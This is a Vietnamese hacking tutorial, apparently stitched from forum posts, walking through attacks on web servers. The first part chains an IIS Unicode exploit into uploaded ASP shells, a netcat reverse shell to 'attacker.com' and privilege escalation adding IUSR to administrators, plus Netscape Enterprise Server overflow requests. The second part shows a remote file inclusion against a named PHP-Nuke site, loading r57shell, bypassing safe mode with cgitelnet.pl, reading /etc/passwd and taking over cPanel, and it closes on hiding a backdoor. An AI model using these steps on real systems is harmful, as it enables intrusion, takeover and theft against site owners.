Như đã nói nó được đổi tên để tránh sự vô hiệu hoá cmd.exe -> redirect ">" qua khai thác này.Sensepost.exe sau đó sử dụng để echo/redirect file upload.asp và upload.inc lần lượt vào web
Trang 1C:\winnt\system32\cmd.exe thành một file tên là sensepost.exe trên thư mục chỉ định như tham số web root ( hay nói cho dễ hiểu ở đây chính là c:\inetpub\scripts) Như đã nói nó được đổi tên để tránh sự vô hiệu hoá cmd.exe -> redirect (">") qua khai thác này.Sensepost.exe sau đó sử dụng để echo/redirect file upload.asp và upload.inc lần lượt vào web root directory ( ở đây là \inetpub\scripts)
Khi upload.asp và các file cần thiết đã ở trên server thì ta có thể sử dụng web
browser để upload nhiều file hơn (xem hình vẽ)
user posted image
Để có thể đoạt quyền kiểm soát server ,attacker có lẽ sẽ upload 2 file khác ( sử dụng upload.asp script).File đầu tiên có lẽ là netcat.Chỉ một thời gian ngắn sau hacker Maceo viết cmdasp.Nó dựa trên script chạy lệnh sử dụng các khai thác Unicode từ trong web browser của attacker.Cmdasp có một giao diện đồ họa dễ dàng cho việc sử dụng và chạy các lệnh unicode,xem hình vẽ
user posted image
Chỉ việc đánh vào browser như sau
http://victim.com/scripts/upload.asp
http://victim.com/scripts/cmdasp.asp
Với nc.exe đã upload và khả năng chạy lệnh của cmd.asp cho thấy một shell với hệ thống của attacker là không cần thiết nữa.Hãy bắt đầu lằng nghe bằng netcat trên
hệ thống của attacker như sau:
C:\>nc -l -p 2002
Sau đó sử dụng cmdasp.asp để tạo ra một netcat shell bằng việc nhập vào lệnh sau vào form và ấn Run:
c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002
Và giờ đây hãy nhìn vào cửa sổ command của chúng ta,nơi mà đang chạy netcat listener trên cổng 2002 như hình vẽ
bạn sẽ thấy 1 shell lệnh được hiện ra.Ở đây đã chạy ipconfig trên remote shell để minh họa rằng máy victim là dual-homed
Leo thang đặc quyền trên iis:
Trang 2Một vài khai thác leo thang đặc quyền tồn tại trên windows nt và 2000.Tuy nhiên rất nhiều trong số chúng yêu cầu các shell tương thích để có thể được gọi thành công.Một remote web session không được xem như một session tưong thích của windows,do vậy nên những khai thác này là không khả thi vớ web servic chỉ là có thể vươn tới thông qua một kẻ lừa đảo
Trên iis 4 ,khai thác LPC port ( local procedure call) gọi là hk.exe không yêu cầu trạng thái tương thích,và có thể được khai thác thông qua directory traversal nếu hk.exe có thể được upload lên victim server.Hk sẽ run lệnh như một tài khoản đầy
đủ quyền hạn trên window,cho phép kẻ lừa đảo dễ dang thêm tài khoản IURS hoặc
là IWA vào nhóm administrator.Đây là lệnh mà intruder sẽ chạy thông qua unicode hoặc double decode:
hk net localgroup administrators IUSR_ machinename /add
Lỗ hổng này đã được patch trên iis 5
Việc leo thang đặc quyền trên iis theo như tôi biết thì chủ yếu dựa trên các kĩ thuật gọi là tiêm dll.Chẳng hạn với iis 5,nếu một attacker có thể upload hay là tìm được một ISAPIDLL dung để gọi RevertToSelf API đặt IUSR vào SYSTEM khi chạy nó.Nó hoạt động gần giống với unicodeloader.pl.Có thể khai thác để thoả hiệp hệ thống
HỆ THỐNG SỬ DỤNG NETSCAPE ENTERPRISE SERVER:(NES)
Lỗi tràn bộ đệm trên nes 3.6 sp2 và nes fast track server 2.0.1.Với khoảng 4080 kí
tự trở nên và shellcode:
GET /[ buffer][ shellcode] HTTP/1.0
Lệnh trong shellcode sẽ chạy như localsystem trên windows
Lỗi tràn bộ đệm thứ 2 được khai thác bởi việc gửi một yêu cầu getproperties với buffer và shell code thích hợp
GETPROPERTIES /[buffer] HTTP/1.0[shellcode]
Shell code này sẽ chạy trong ngữ cảnh system.Áp dụng trên nes enterprise server vs3.6 với sp7
Trang 3Khắc phục:năng cấp bản vá lỗi tại
http://enterprise.netscape.com hay tại http://wwws.sun.com/software/download/ Novell GroupWise Arbitrary File Access
Một ví dụ điển hình về serlet không an toàn,lỗ hổng này có thể có từ window2000 tới novel.Xem ví dụ sau:
http://victim.com/servlet/webacc?Use /webacc.cfg%00
unixzdo(HCE)
1 Phương Pháp ByPass Safe-Mode
Lần trước có làm 1 cái video về cái này, nhưng nó hơi nặng , thôi hôm nay vít thành 1 Tút cho anh em dễ đọc hem
+Site victim của tôi là : http://tusivachungsinh.net/
Nhìn vào ta sẽ thấy nó xài Php-Nuke, mà thằng này thì dính đầy lỗi Critical Ta check 1 lỗi phổ biến của nó để include shell xem
Lỗi này đã đc public khá lâu rồi,nhưng nhiều thằng ko chịu Update thì ta vẫn mần
ăn đc hehe
vô milw0rm : http://milw0rm.com/exploits/1866 ( Bug PHP-Nuke <= All version - Remote File Include Vulnerabilities )
Qua lỗi này tôi get đc 1 con shell lên Host qua đường Link
Trích:
hxxp://tusivachungsinh.nt/modules/Forums/admin/admin_avatar.php?phpbb_root_ path=hxxp://sheva7ac.googlepages.com/r57shell.txt?
Okies !
Đây là thông tin mà con r57 đem lại
Trích:
Linux hk2.vn-sg.com 2.4.21-40.ELsmp #1 SMP Wed Mar 15 14:44:44 EST 2006 i686 -
Trang 4Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2
mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8
uid=32135 ( tusiva ) gid=32136 ( tusiva )
/home/tusiva/public_html/modules/Forums/admin/
Và thêm nữa là thằng này nó bật Safe-Mode, dis khá nhiều các hàm quan trọng Trích:
safe_mode: ON
Disable functions : show_source,dl,exec,shell_exec,system,popen,pclose
,proc_open,proc_close,passthru,virtual,leak,chgrp, ini_alter,ini_restore
Command lệnh của con shell vì thế ko hiện đc luôn
Nhưng nhìn kĩ lại ta thấy uid=tusiva , vậy thì mặc mẹ nó ta có quyền owner của site này roài
Ta đã biết Safe-Mode bật và disable hết các hàm PHP chạy shell của ta, nhưng với các Script khác thì nó vô dụng
Vì thế tôi sẽ get 1 con shell dùng perl script lên server này , con mà anh em hay dùng là cgitelnet.pl (ngoài ra nghe nói còn có con shell ".cgi" nữa , chắc dùng vào đây cũng đc anh em ai có thì share nhé) ý tưởng là như vậy
+Đầu tiên tạo 1 thư mục riêng để làm việc cho sướng, mặc dù Safemode On nhưng các hàm bình thường của PHP vẫn chạy đc như thường (nếu nó dis hết thì có mà bán Host cho ma nó mua )
Trên con r57 ta gõ vào ô Eval PHP code :
Trích:
mkdir("./new", 0755);
ấn Excute , sau đó quay trở lại ta đã thấy trong thư mục
/home/tusiva/public_html/modules/Forums/admin/ đã xuất hiện thêm 1 thư mục con "new" nữa với chmod là 755 roài (thư mục admin chmod thế nào cũng ko quan trọng vì mình đã có quyền owner của nó rồi)
Chuyển đến thư mục /home/tusiva/public_html/modules/Forums/admin/new để làm việc , Oke !
Tiếp theo là công đoạn Get con cgitelnet.pl lên Host, vào phần "Download files
Trang 5from remote ftp-server" trên con r57 ta điền vào thông tin của Host FTP có chứa con cgitelnet của ta
Trích:
FTP-server: netfast.org
Login: micimacko
Password: 123456
File on ftp: /wwwroot/cgitelnet.pl
Local file: /home/tusiva/public_html/modules/Forums/admin/new
Transfer mode: ASCII
rồi ấn Download để Transfer nó về Host
Quay lại thư mục new ta thấy có con cgitelnet.pl rồi , nó đang mặc định chmod là
644
Ta phải chmod lại cho nó thành 755, chạy PHPcode như sau:
Trích:
chmod("./cgitelnet.pl",0755);
Okies , đã xong !
Giờ ta vào Link hxxp://tusivachungsinh.nt/modules/Forums/admin/new/cgitelnet.pl
đã thấy màn hình đen đen bí hiểm của con cgitelnet hehe, như vậy là ta đã có
1 command shell trên sv với uid=tusiva , bất chấp sv đang bật Safe-Mode
++Lưu ý: con cgitelnet.pl chỉ chạy đc với các đk sau:
-Get về Host với dạng ASCII
-chmod 755, thư mục chứa nó cũng phải có chmod 755 (thường ng ta Get về cgi-bin, nhưng thực ra ở đâu có 755 là đc)
-có 2 cái quan trọng nhất nữa là : uid=owner & sv hỗ trợ Perl
++Với con cgitelnet này có thể change File contactemail để forgot pass lấy cPanel hay là cat /etc/passwd để xem File passwd
End!
Chúc thành công
.:micimacko -HcE:
Ẩn backdoor phòng khi cần đến